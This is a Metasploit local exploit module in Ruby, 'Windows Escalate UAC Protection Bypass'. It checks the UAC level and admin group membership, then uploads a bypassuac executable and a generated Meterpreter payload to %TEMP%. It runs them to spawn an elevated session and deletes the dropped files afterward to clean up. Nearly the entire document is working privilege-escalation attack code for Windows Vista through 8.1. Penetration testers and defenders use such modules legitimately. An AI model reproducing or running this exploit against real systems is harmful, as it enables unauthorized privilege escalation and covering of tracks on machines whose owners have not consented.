1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Exploit::EXE
10
  include Post::File
11
  include Post::Windows::Priv
12
  include Post::Windows::Runas
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Windows Escalate UAC Protection Bypass',
19
        'Description' => %q{
20
          This module will bypass Windows UAC by utilizing the trusted publisher
21
          certificate through process injection. It will spawn a second shell that
22
          has the UAC flag turned off.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
27
          'mitnick',
28
          'mubix' # Port to local exploit
29
        ],
30
        'Platform' => [ 'win' ],
31
        'SessionTypes' => [ 'meterpreter' ],
32
        'Targets' => [
33
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
34
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
35
        ],
36
        'DefaultTarget' => 0,
37
        'References' => [
38
          [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
39
        ],
40
        'DisclosureDate' => '2010-12-31',
41
        'Compat' => {
42
          'Meterpreter' => {
43
            'Commands' => %w[
44
              stdapi_sys_process_kill
45
            ]
46
          }
47
        },
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55

56
    register_options([
57
      OptEnum.new('TECHNIQUE', [
58
        true, 'Technique to use if UAC is turned off',
59
        'EXE', %w[PSH EXE]
60
      ]),
61
    ])
62
  end
63

64
  def check_permissions!
65
    # Check if you are an admin
66
    vprint_status('Checking admin status...')
67
    admin_group = is_in_admin_group?
68

69
    if admin_group.nil?
70
      print_error('Either whoami is not there or failed to execute')
71
      print_error('Continuing under assumption you already checked...')
72
    elsif admin_group
73
      print_good('Part of Administrators group! Continuing...')
74
    else
75
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
76
    end
77

78
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
79
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
80
    end
81
  end
82

83
  def exploit
84
    validate_environment!
85

86
    case get_uac_level
87
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
88
      fail_with(Failure::NotVulnerable,
89
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
90
    when UAC_DEFAULT
91
      print_good 'UAC is set to Default'
92
      print_good 'BypassUAC can bypass this setting, continuing...'
93
    when UAC_NO_PROMPT
94
      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
95
      runas_method
96
      return
97
    end
98

99
    check_permissions!
100

101
    upload_binaries!
102

103
    cmd = "#{path_bypass} /c #{path_payload}"
104
    # execute the payload
105
    pid = cmd_exec_get_pid(cmd)
106

107
    ::Timeout.timeout(30) do
108
      select(nil, nil, nil, 1) until session_created?
109
    end
110
    session.sys.process.kill(pid)
111
    # delete the uac bypass payload
112
    file_rm(path_bypass)
113
    file_rm("#{expand_path('%TEMP%')}\\tior.exe")
114
    cmd_exec('cmd.exe', "/c del \"#{expand_path('%TEMP%')}\\w7e*.tmp\"")
115
  end
116

117
  def path_bypass
118
    @path_bypass ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
119
  end
120

121
  def path_payload
122
    @path_payload ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
123
  end
124

125
  def upload_binaries!
126
    print_status('Uploaded the agent to the filesystem....')
127
    #
128
    # Generate payload and random names for upload
129
    #
130
    payload = generate_payload_exe
131

132
    # path to the bypassuac binary
133
    path = ::File.join(Msf::Config.data_directory, 'post')
134

135
    bpexe = ::File.join(path, "bypassuac-#{sysinfo['Architecture'] == ARCH_X86 ? 'x86' : 'x64'}.exe")
136

137
    print_status('Uploading the bypass UAC executable to the filesystem...')
138

139
    begin
140
      #
141
      # Upload UAC bypass to the filesystem
142
      #
143
      upload_file(path_bypass.to_s, bpexe)
144
      print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
145

146
      write_file(path_payload, payload)
147
    rescue ::Exception => e
148
      print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")
149
      return
150
    end
151
  end
152

153
  def runas_method
154
    case datastore['TECHNIQUE']
155
    when 'PSH'
156
      # execute PSH
157
      shell_execute_psh
158
    when 'EXE'
159
      # execute EXE
160
      shell_execute_exe
161
    end
162
  end
163

164
  def validate_environment!
165
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
166
    #
167
    # Verify use against Vista+
168
    #
169
    version = get_version_info
170
    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)
171
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
172
    end
173

174
    if is_uac_enabled?
175
      print_status 'UAC is Enabled, checking level...'
176
    elsif is_in_admin_group?
177
      fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
178
    else
179
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
180
    end
181
  end
182
end
183

184